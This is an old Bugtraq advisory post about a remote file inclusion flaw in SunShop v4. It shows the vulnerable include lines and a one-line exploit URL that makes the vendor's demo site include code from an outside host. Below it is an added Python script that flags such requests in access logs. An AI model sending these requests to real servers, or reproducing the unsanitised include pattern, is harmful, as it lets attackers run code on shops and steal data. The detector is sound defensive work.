Message-ID: <20070425153816.22259.qmail@securityfocus.com>
Date: 25 Apr 2007 15:38:16 -0000
From: info@...kerz.ir
To: bugtraq@...urityfocus.com
Subject: sunshop v4 >> RFI

vendor : turnkeywebtools.com
by : s3rv3r_hack3r ( alijsb@...oo.com )

bugz:
++++++++++++++++++++
include/payment/payflow_pro.php
> include $abs_path."/include/payment/payflow_pro/pfpro.class.php";
++++++++++++++++++++
global.php
require_once $abs_path."/libsecure.php";
++++++++++++++++++++
libsecure.php
include $abs_path . '/admin/config.php';
++++++++++++++++++++

EXploit :
file.php?abs_path=http://shell

for example :
http://demos.turnkeywebtools.com/ss4/include/payment/payflow_pro.php?abs_path=http://www.hackerz.ir/?
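
Requests matching the pattern reported above can be found in web server access logs. The following is an added example, not part of the original post or the vendor's code: it flags requests that set `abs_path` to a URL. The combined log format, the sample lines, the `/shop` prefix, the hosts and the list of URL wrappers are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "abs_path"  # request parameter named in the advisory
# URL wrappers PHP can include from; this list is an assumption of the example.
REMOTE = re.compile(r"^\s*(?:(?:https?|ftps?|php)://|data:)", re.IGNORECASE)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def find_abs_path_rfi(log_lines):
    """Return (client, script, value) for each request that sets abs_path to a URL."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue  # not a parseable request line
        target = urlsplit(match.group(1))
        # parse_qsl percent-decodes, so encoded forms (http%3A%2F%2F...) are caught too.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == PARAM and REMOTE.match(value):
                hits.append((line.split()[0], target.path, value))
    return hits


# Constructed sample lines; addresses and hosts are documentation placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Apr/2007:15:40:01 +0000] '
    '"GET /shop/index.php?l=product_list HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Apr/2007:15:41:12 +0000] '
    '"GET /shop/include/payment/payflow_pro.php?abs_path=http://remote.example/x? HTTP/1.1" 200 310',
    '198.51.100.7 - - [25/Apr/2007:15:41:15 +0000] '
    '"GET /shop/global.php?abs_path=hTTp%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 0',
    '192.0.2.10 - - [25/Apr/2007:15:42:30 +0000] '
    '"GET /shop/libsecure.php?abs_path=/var/www/shop HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, script, value in find_abs_path_rfi(SAMPLE_LOG):
        print(f"{client} requested {script} with {PARAM}={value!r}")
```

A local filesystem value such as the one in the last sample line is not flagged here, although any externally supplied `abs_path` deserves review.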